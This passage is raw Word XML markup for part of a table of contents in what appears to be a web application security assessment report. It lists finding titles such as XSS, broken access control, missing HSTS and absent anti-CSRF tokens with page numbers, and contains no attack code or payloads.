              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Authentication Brute-force Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100233 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67802BCB" w14:textId="353812C1"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34" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Broken Access Control Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100234 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B1D0601" w14:textId="10B7549A"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35" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.4</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cross-Site Scripting (XSS) Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100235 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="637C267C" w14:textId="3F790D6A"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36" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.5</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HSTS Missing from HTTPS Server</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100236 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CDD3FE2" w14:textId="49C47760"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37" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.6</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>X-Frame-Options Header Not Set</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100237 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F444B4E" w14:textId="3391AEA5" w:rsidR="00E700EE" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:sectPr w:rsidR="00E700EE" w:rsidSect="0019315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hyperlink w:anchor="_Toc94100238" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.7</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Directory Listing Enabled</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100238 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CDA7DBA" w14:textId="60171E3F"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39" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.8</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Application Error Disclosure</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100239 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65164C24" w14:textId="509C34AC"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40" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.9</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Using Components with Known Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100240 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2373FFC9" w14:textId="0AD11E33"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41" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.10</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Insufficient Logging &amp; Monitoring</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100241 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34287B6A" w14:textId="05647D52"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42" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.11</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web Application Cookies Not Marked Secure</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100242 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10137098" w14:textId="4BE68691"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43" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Other Testing Information</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100243 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54D33DF3" w14:textId="047A8879"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44" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>FTP, POP, IMAP, and SMTP Credentials Transmitted Unencrypted</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100244 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46FC7F19" w14:textId="225324C0"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45" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Absence of Anti-CSRF Tokens</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100245 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FA4CA88" w14:textId="6ED099D9"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46" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Severity Table</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100246 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FFAA530" w14:textId="10F94014" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100247" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
